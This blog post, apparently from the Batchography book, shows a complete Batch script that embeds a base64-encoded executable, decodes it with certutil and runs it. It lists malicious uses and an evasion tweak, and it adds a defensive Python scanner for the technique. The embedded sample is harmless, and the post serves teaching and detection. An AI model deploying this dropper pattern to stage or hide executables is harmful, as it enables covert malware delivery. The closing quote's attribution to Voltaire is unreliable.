Batchography: Embedding an executable file in a Batch script

In this blog post, I am going to share with you a recipe from the Batchography book that illustrates and explains in detail how to embed executable files in a Batch script and execute them after they are dropped.

This technique does not rely on a polyglot Batch file, where the first part is a Batch script and the rest is VBScript or JScript. If you want to learn more about writing polyglot Batch scripts, please refer to Chapter 4 of the Batchography book.


Get the book from Amazon: the print edition or the e-book edition.


There are many reasons why you may want to embed one or more executable files in a Batch script, but, like a double-edged sword, the technique can be used for good or for bad:

  • Embed a small downloader stub: the embedded executable is a small remote installer that downloads the rest of the setup files to the system.
  • Embed a driver file: the embedded executable is a driver. This can be a very dangerous driver (such as a rootkit) or an innocent, useful one (such as a printer driver). The Batch script may use built-in tools such as PNPUTIL.EXE to install the driver.
  • Embed an executable that carries an escalation-of-privilege exploit: the embedded executable exploits a bug in the operating system and grants the Batch file SYSTEM or administrative privileges, allowing it to do more damage to the system.
  • Embed a malicious program: the embedded file could be a keylogger. The Batch file drops the keylogger and then creates an auto-start extensibility point (ASEP), for example with the REG.EXE command, or even installs the malware as a system service (SC.EXE).
  • Embed various binary files: the Batch script could act as a self-extracting archive (SFX). When executed, it unpacks the embedded files to the system.

I am not encouraging you to use this technique for malicious purposes; rather, I am drawing your attention to the potential harm that can be done with the Batch scripting language alone. If you are a security product vendor, you may want to improve your product’s signatures and behavior-monitoring logic.

Let’s get to it

The idea behind embedding one or more executables (or any other binary file) in a Batch script is that the script must be able to turn text back into binary data. One way to do that is to rely on the built-in certutil.exe utility, which can base64-encode the executable file into text. The Batch script then picks up the embedded base64 text, decodes it into a temporary executable file, runs the file and then deletes it.

Here’s how the script looks:

@echo off
::
:: The Batchography book by Elias Bachaalany
::

  setlocal enabledelayedexpansion

  set "FN=%TEMP%\evil.tmp"
  call :extract-embedded-bin "%FN%"
  start "" "%FN%"
  goto :eof


:extract-embedded-bin <1=OutFileName>
  setlocal

  :: Find the line number of the BEGIN marker inside this very script
  :: (%~f0 is the script's own full path). /B anchors the match at the
  :: start of a line, so the findstr command line itself is not matched.
  set MBEGIN=-1
  for /f "usebackq tokens=1 delims=: " %%a in (`findstr /B /N /C:"-----BEGIN CERTIFICATE-----" "%~f0"`) DO (
    set /a MBEGIN=%%a-1
  )

  :: No marker means nothing is embedded
  if "%MBEGIN%"=="-1" (
    endlocal
    exit /b -1
  )

  :: Delete previous output files
  if exist "%~1.tmp" del "%~1.tmp"
  if exist "%~1" del "%~1"

  :: Copy every line from the BEGIN marker to the end of the script into a
  :: temporary text file; skip=N skips the script lines above the marker.
  :: (REM rather than :: inside the block, and the redirect placed first so
  :: no trailing space is written after each base64 line.)
  for /f "usebackq skip=%MBEGIN% tokens=* delims=" %%a in ("%~f0") DO (
    REM ##A
    >>"%~1.tmp" echo %%a
  )

  :: certutil understands the BEGIN/END CERTIFICATE envelope and writes the
  :: decoded bytes to the output file
  certutil -decode "%~1.tmp" "%~1" >nul 2>&1
  del "%~1.tmp"

  endlocal
  exit /b 0


-----BEGIN CERTIFICATE-----
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v
dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABdXG3BGT0Dkhk9A5IZPQOS
lyIQkh49A5LlHRGSGD0DklJpY2gZPQOSAAAAAAAAAABQRQAATAEBALL6QFcAAAAA
AAAAAOAADwELAQUMAAIAAAAAAAAAAAAAEBAAAAAQAAAAIAAAAABAAAAQAAAAAgAA
BAAAAAAAAAAEAAAAAAAAAAAgAAAAAgAAAAAAAAIAAAAAABAAABAAAAAAEAAAEAAA
AAAAABAAAAAAAAAAAAAAAGwQAAA8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAEAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAA
7gAAAAAQAAAAAgAAAAIAAAAAAAAAAAAAAAAAACAAAGAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADSEAAAAAAAALgQAAAAAAAA
6zJEcm9wcGVkIGV4ZWN1dGFibGUATGV0J3MgZG8gbW9yZSBldmlsIHN0dWZmLCBu
b3QhAGoAaBIQQABoJRBAAGoA6AcAAABqAOgGAAAA/yUIEEAA/yUAEEAAzMywEAAA
AAAAAAAAAADGEAAACBAAAKgQAAAAAAAAAAAAAOAQAAAAEAAAAAAAAAAAAAAAAAAA
AAAAAAAAAADSEAAAAAAAALgQAAAAAAAAsQFNZXNzYWdlQm94QQB1c2VyMzIuZGxs
AACbAEV4aXRQcm9jZXNzAGtlcm5lbDMyLmRsbAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAA==
-----END CERTIFICATE-----

That is one way of doing it. Malware writers can layer further encoding on top of the base64 (at code site ##A) to evade signature-based detection. As the Batchography book explains, doing this in the Batch language is not hard at all!
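As an added example that is not part of the post or the book, here is a small Python triage script that mirrors what the Batch file does (finds the BEGIN/END CERTIFICATE block and base64-decodes it) and reports the indicators a defender would log: the script reading its own path through %~f0, a certutil -decode call, and an MZ header at the start of the decoded blob. The sample script and its 64-byte fake payload are constructed for the demonstration, and the function names are my own.

```python
import base64
import re

# Envelope lines certutil -decode recognises; the dropper script writes them verbatim
BEGIN = "-----BEGIN CERTIFICATE-----"
END = "-----END CERTIFICATE-----"
# Indicators of the technique: the script reading its own path, and a certutil decode
SELF_READ_RE = re.compile(r"%~f0", re.IGNORECASE)
CERTUTIL_RE = re.compile(r"\bcertutil(\.exe)?\b.*-decode", re.IGNORECASE)


def extract_embedded_blob(script_text: str) -> "bytes | None":
    """Mirror the dropper's extraction: take the lines between the BEGIN/END
    markers, strip whitespace and base64-decode them (None if no block)."""
    lines = script_text.splitlines()
    starts = [i for i, line in enumerate(lines) if line.strip() == BEGIN]
    if not starts:
        return None
    body = []
    for line in lines[starts[0] + 1:]:
        if line.strip() == END:
            break
        body.append(line.strip())
    try:
        return base64.b64decode("".join(body), validate=True)
    except ValueError:  # binascii.Error is a ValueError: not valid base64
        return None


def scan_batch_script(script_text: str) -> dict:
    """Return the findings a defender would log for one .bat/.cmd file."""
    blob = extract_embedded_blob(script_text)
    findings = {
        "reads_own_file": bool(SELF_READ_RE.search(script_text)),
        "certutil_decode": bool(CERTUTIL_RE.search(script_text)),
        "embedded_blob_bytes": len(blob) if blob else 0,
        "blob_is_pe": bool(blob) and blob[:2] == b"MZ",  # DOS/PE header magic
    }
    dropper = findings["certutil_decode"] and findings["blob_is_pe"]
    findings["verdict"] = "embedded-executable-dropper" if dropper else "no-match"
    return findings


# Constructed sample, not a real binary: a stand-in dropper whose payload is a
# 64-byte fake PE (the MZ signature followed by zero padding)
FAKE_PE = b"MZ\x90\x00" + b"\x00" * 60
SAMPLE_SCRIPT = "\n".join([
    "@echo off",
    'for /f "usebackq skip=3 tokens=* delims=" %%a in ("%~f0") do >>"%TEMP%\\x.tmp" echo %%a',
    'certutil -decode "%TEMP%\\x.tmp" "%TEMP%\\x.exe" >nul 2>&1',
    BEGIN,
    base64.b64encode(FAKE_PE).decode(),
    END,
])
```

Extra encoding at ##A would defeat the base64 step of this check but not the other two indicators, which is why monitoring certutil -decode invocations and scripts that read their own file is the more durable control.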

The example above drops a harmless 1 KB executable file:

[Screenshot: Embedding executables inside Batch files]

And finally, always remember:

“WITH GREAT POWER THERE MUST ALSO COME – – GREAT RESPONSIBILITY!”

— Œuvres de Voltaire, Volume 48
